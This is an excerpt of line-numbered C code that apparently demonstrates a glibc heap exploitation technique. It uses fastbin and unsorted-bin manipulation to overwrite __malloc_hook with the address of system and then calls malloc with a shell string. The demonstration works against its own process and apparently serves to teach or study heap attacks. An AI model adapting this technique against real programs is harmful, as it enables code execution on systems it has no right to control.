106  uint8_t* fastbin_victim = malloc(0x60);
111  malloc(0x80);
114  uint8_t* main_arena_use = malloc(0x80);
118  uint8_t* relative_offset_heap = malloc(0x60);
122  free(main_arena_use);
139  uint8_t* fake_libc_chunk = malloc(0x60);
143  long long __malloc_hook = ((long*)fake_libc_chunk)[0] - 0xe8;
149  free(relative_offset_heap);
155  free(fastbin_victim);
201  fastbin_victim[0] = 0x00;
246  long long __malloc_hook_adjust = __malloc_hook - 0x23;
249  int8_t byte1 = (__malloc_hook_adjust) & 0xff;
250  int8_t byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
251  fake_libc_chunk[0] = byte1;
252  fake_libc_chunk[1] = byte2;
260  malloc(0x60);
261  malloc(0x60);
266  uint8_t* malloc_hook_chunk = malloc(0x60);
312  uint8_t* unsorted_bin_ptr = malloc(0x80);
313  malloc(0x30);
317  free(unsorted_bin_ptr);
322  __malloc_hook_adjust = __malloc_hook - 0x10;
323  byte1 = (__malloc_hook_adjust) & 0xff;
324  byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
331  unsorted_bin_ptr[8] = byte1;
334  unsorted_bin_ptr[9] = byte2;
355  malloc(0x80);
357  long long system_addr = (long long)dlsym(RTLD_NEXT, "system");
379  malloc_hook_chunk[19] = system_addr & 0xff;
381  malloc_hook_chunk[20] = (system_addr >> 8) & 0xff;
382  malloc_hook_chunk[21] = (system_addr >> 16) & 0xff;
383  malloc_hook_chunk[22] = (system_addr >> 24) & 0xff;
392  malloc((long long)shell);